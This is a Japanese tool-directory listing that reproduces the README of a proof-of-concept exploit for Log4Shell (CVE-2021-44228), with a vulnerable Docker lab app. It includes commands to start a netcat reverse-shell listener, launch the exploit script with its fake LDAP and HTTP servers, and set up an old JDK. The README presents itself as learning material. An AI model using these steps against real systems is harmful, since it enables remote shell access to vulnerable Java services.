Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
LOGJ4_PocShell_CVE-2021-44228 — CVE-2021-44228(Log4Shell)の概念実証エクスプロイト。LDAPサーバーとHTTPサーバーを自動化し、脆弱なJavaアプリケーションにリバースシェルペイロードを配信します。 | Kitploit
ツール/GitHubGitHub/yanghyperdata/logj4_pocshell_cve-2021-44228
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubyanghyperdata/logj4_pocshell_cve-2021-44228

LOGJ4_PocShell_CVE-2021-44228

CVE-2021-44228(Log4Shell)の概念実証エクスプロイト。LDAPサーバーとHTTPサーバーを自動化し、脆弱なJavaアプリケーションにリバースシェルペイロードを配信します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
22年前未レビュー

log4j-shell-poc

最近発見された CVE-2021-44228 脆弱性の Proof-Of-Concept です。

最近、log4j(Java のロギングライブラリで、Elasticsearch、Minecraft など非常に広く使用されています)に新たな脆弱性が見つかりました。

このリポジトリには、脆弱なサンプルアプリケーションとその Proof-Of-Concept (PoC) エクスプロイトが含まれています。

概念実証 (PoC)

PoC として、プロセスを自動化する Python ファイルがあります。

必要条件:

root@kitploit:~
pip install -r requirements.txt

使用方法:

  • リバースシェル接続を受け付ける netcat リスナーを起動します。
root@kitploit:~
nc -lvnp 9001
  • エクスプロイトを起動します。
    注: これを機能させるには、展開した Java アーカイブの名前が jdk1.8.0_20 であり、同じディレクトリに存在する必要があります。
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[+] Exploit java class created success
[+] Setting up fake LDAP server
Listening on 0.0.0.0:1389

このスクリプトは HTTP サーバと LDAP サーバをセットアップし、脆弱なパラメータに貼り付けるためのペイロードも作成します。その後、すべてがうまくいけば、lport でシェルを取得できるはずです。


脆弱なアプリケーション

脆弱な Web アプリケーション用の Dockerfile が用意されています。以下の手順で使用できます。

root@kitploit:~
1: docker build -t log4j-shell-poc .
2: docker run --network host log4j-shell-poc

起動したら、localhost:8080 でアクセスできます。


Java バージョンの入手

Oracle は過去のすべての Java バージョンのアーカイブを提供しています:
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html.
8u20 までスクロールし、お使いのオペレーティングシステムとハードウェアに適したファイルをダウンロードしてください。 Screenshot from 2021-12-11 00-09-25

注: パッケージをダウンロードするにはアカウントを作成する必要があります。

アーカイブをダウンロードして展開すると、jdk1.8.0_20/bin に java と関連するいくつかのバイナリがあります。
注: 機能させるために、JDK フォルダをこのリポジトリに同じ名前で展開してください。

root@kitploit:~
❯ tar -xf jdk-8u20-linux-x64.tar.gz

❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

免責事項

このリポジトリは、CVE-2021-44228 に対するワンクリックエクスプロイトを意図したものではありません。このプロジェクトの目的は、この脆弱性について学び、自身のアプリケーションをテストする(ただし、この目的にはより優れたアプリケーションがあります。例: https://log4shell.tools/)人々を支援することです。

ツールをダウンロード